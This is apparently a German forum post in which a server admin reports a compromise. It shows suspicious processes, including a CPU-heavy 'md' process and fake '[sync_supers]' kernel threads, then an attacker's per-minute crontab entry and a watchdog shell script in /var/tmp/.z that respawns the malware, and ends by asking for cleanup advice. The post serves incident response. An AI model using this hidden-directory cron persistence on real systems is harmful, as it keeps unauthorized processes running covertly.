Als erstes mal einen Blick in die Auslastung, brachte folgende verdächtigte Prozesse hervor:
Code: Alles auswählen
23142 ftpuser 20 0 1569176 98512 1232 S 190,1 1,2 3:11.00 md
16339 ftpuser 20 0 26368 4160 1104 R 3,9 0,0 26:18.62 [sync_supers]
26214 ftpuser 20 0 26368 4160 1108 R 3,6 0,0 85:52.18 [sync_supers]
26218 ftpuser 20 0 26548 4364 1308 S 1,3 0,1 83:06.46 [sync_supers]
16283 ftpuser 20 0 26548 4380 1316 S 0,3 0,1 5:12.81 [sync_supers]
Code: Alles auswählen
> crontab -l -u ftpuser
* * * * * /var/tmp/.z/upd >/dev/null 2>&1
Code: Alles auswählen
> cat /var/tmp/.z/upd
#!/bin/sh
if test -r /var/tmp/.z/bash.pid; then
pid=$(cat /var/tmp/.z/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
sleep 1
else
cd /var/tmp/.z
./run &>/dev/null
exit 0
fi
fi
Wenn jemand Interesse für den Inhalt der beiden Verzeichnisse hat, kann ich gerne Sicherungen bereitstellen!
Was sollte man nach so einem Angriff noch kontrollieren um sicher zu gehen dass der Server wieder sauber ist?
